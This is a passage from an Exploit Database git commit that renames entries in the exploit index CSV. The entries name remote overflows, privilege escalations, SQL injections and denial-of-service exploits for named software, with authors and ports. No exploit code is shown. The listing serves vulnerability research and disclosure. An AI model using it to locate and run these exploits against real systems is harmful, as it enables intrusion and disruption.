From fa1b17f699ce002073fe75757bdf340be5c660e0 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 30 Sep 2016 05:01:16 +0000 Subject: [PATCH] DB: 2016-09-30 1 new exploits Microsoft Windows - RPC DCOM Remote Exploit (18 Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (1) Microsoft Windows - 'RPC DCOM' Remote Exploit (2) Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal) Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate Get Request Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow PMSoftware Simple Web Server - GET Request Remote Buffer Overflow CUPS Server 1.1 - (Get Request) Denial of Service CUPS Server 1.1 - GET Request Denial of Service BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC) TFTPD32 2.81 - GET Request Format String Denial of Service (PoC) Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service Essentia Web Server 2.15 - (GET Request) Remote Denial of Service Essentia Web Server 2.15 - GET Request Remote Denial of Service webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Buffer Overflow webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield) webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname) Microsoft Windows Message Queuing Service - RPC Buffer Overflow Netgear WGR614v9 - Wireless Router Get Request 
Denial of Service Netgear WGR614v9 Wireless Router - GET Request Denial of Service XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow (PoC) XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC) XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH) httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH) Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC) Mereo 1.8.0 - (Get Request) Remote Denial of Service Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Request Remote Denial of Service httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH) httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH) httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service Kolibri+ WebServer 2 - (Get Request) Denial of Service Kolibri+ WebServer 2 - GET Request Denial of Service Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH) Kolibri+ WebServer 2 - GET Request Remote Overwrite (SEH) httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service httpdx 1.4 - Get Request Buffer Overflow httpdx 1.4 - GET Request Buffer Overflow Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC) httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC) HTTPDX - tolog() Function Format String (1) httpdx - tolog() Function Format String (1) HTTPDX - tolog() Function Format String (2) httpdx - tolog() Function Format String (2) HTTPDX - h_handlepeer() Function Buffer Overflow (Metasploit) httpdx - h_handlepeer() Function Buffer Overflow 
(Metasploit) glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1) Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1) httpdx 1.5.4 - Remote HTTP Server Denial of Service httpdx 1.5.4 - HTTP Server Remote Denial of Service Working Resources BadBlue 1.7.3 - Get Request Denial of Service Working Resources BadBlue 1.7.3 - GET Request Denial of Service KeepNote 0.7.8 - Command Execution My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service Snowblind Web Server 1.0/1.1 - (GET Request) Buffer Overflow Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow Proxomitron Proxy Server - Long Get Request Remote Denial of Service Proxomitron Proxy Server - Long GET Request Remote Denial of Service
---
files.csv | 79 ++++++++++++++++---------------
platforms/multiple/local/40440.py | 45 ++++++++++++++++++
platforms/windows/dos/11343.py | 2 +-
3 files changed, 86 insertions(+), 40 deletions(-)
create mode 100755 platforms/multiple/local/40440.py
diff --git a/files.csv b/files.csv
index 610ad63e8..686808d60 100755
--- a/files.csv
+++ b/files.csv
@@ -67,14 +67,14 @@ id,file,description,date,author,platform,type,port
 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0
-69,platforms/windows/remote/69.c,"Microsoft Windows - RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
-70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135
+69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
+70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0
 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0
 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0
 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
 75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
-76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
+76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal)",2003-08-07,oc192,windows,remote,135
 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80
 78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - System Exploit",2003-08-13,ash,windows,local,0
@@ -113,7 +113,7 @@ id,file,description,date,author,platform,type,port
 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow (SPARC version)",2003-10-27,osker178,solaris,local,0
 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
-117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135
+117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0
 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0
@@ -699,7 +699,7 @@ id,file,description,date,author,platform,type,port
 876,platforms/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Privilege Escalation",2005-03-14,"Christophe Devine",linux,local,0
 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",linux,local,0
 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0
-879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
+879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
 880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos,0
 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0
 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,windows,dos,0
@@ -764,7 +764,7 @@ id,file,description,date,author,platform,type,port
 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0
 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0
 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0
-945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80
+945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Request Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80
 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0
 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25
 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0
@@ -994,7 +994,7 @@ id,file,description,date,author,platform,type,port
 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0
 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0
 1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution (update2)",2005-09-04,tracewar,cgi,webapps,0
-1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service",2005-09-05,tracewar,linux,dos,0
+1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0
 1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0
@@ -1176,7 +1176,7 @@ id,file,description,date,author,platform,type,port
 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0
 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80
-1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
+1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0
 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0
 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0
@@ -1191,7 +1191,7 @@ id,file,description,date,author,platform,type,port
 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701
 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0
 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
-1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0
+1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0
 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0
 1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0
 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0
@@ -1439,7 +1439,7 @@ id,file,description,date,author,platform,type,port
 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
 1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0
 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0
-1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0
+1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0
 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0
 1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0
 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0
@@ -2031,7 +2031,7 @@ id,file,description,date,author,platform,type,port
 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0
 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0
 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0
-2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service",2006-09-08,n00b,windows,dos,0
+2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0
 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0
 2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0
 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0
@@ -2408,7 +2408,7 @@ id,file,description,date,author,platform,type,port
 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0
 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0
 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
-2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - (GET Request) Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
+2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0
 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0
@@ -3571,7 +3571,7 @@ id,file,description,date,author,platform,type,port
 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service",2007-05-12,shinnai,windows,dos,0
 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps,0
 3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0
-3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
+3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0
 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0
 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0
@@ -3580,7 +3580,7 @@ id,file,description,date,author,platform,type,port
 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0
 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)",2007-05-14,shinnai,windows,dos,0
-3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080
+3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080
 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113
@@ -4580,7 +4580,7 @@ id,file,description,date,author,platform,type,port
 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0
 4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0
 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0
-4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0
+4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0
 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0
 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0
 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0
@@ -7634,7 +7634,7 @@ id,file,description,date,author,platform,type,port
 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0
 8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
-8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0
+8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0
 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0
 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0
 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
@@ -7851,8 +7851,8 @@ id,file,description,date,author,platform,type,port
 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0
 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0
 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0
-8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0
-8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
+8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0
+8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80
 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0
@@ -8222,13 +8222,13 @@ id,file,description,date,author,platform,type,port
 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0
-8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21
+8716,platforms/windows/remote/8716.py,"httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21
 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0
 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0
-8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0
-8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service",2009-05-18,Stack,windows,dos,0
+8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0
+8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Request Remote Denial of Service",2009-05-18,Stack,windows,dos,0
 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps,0
 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0
 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0
@@ -8236,7 +8236,7 @@ id,file,description,date,author,platform,type,port
 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps,0
 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps,0
 8731,platforms/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0
-8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21
+8732,platforms/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21
 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow",2009-05-19,rgod,windows,remote,0
 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0
 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0
@@ -8395,7 +8395,7 @@ id,file,description,date,author,platform,type,port
 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0
 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0
 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0
-8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0
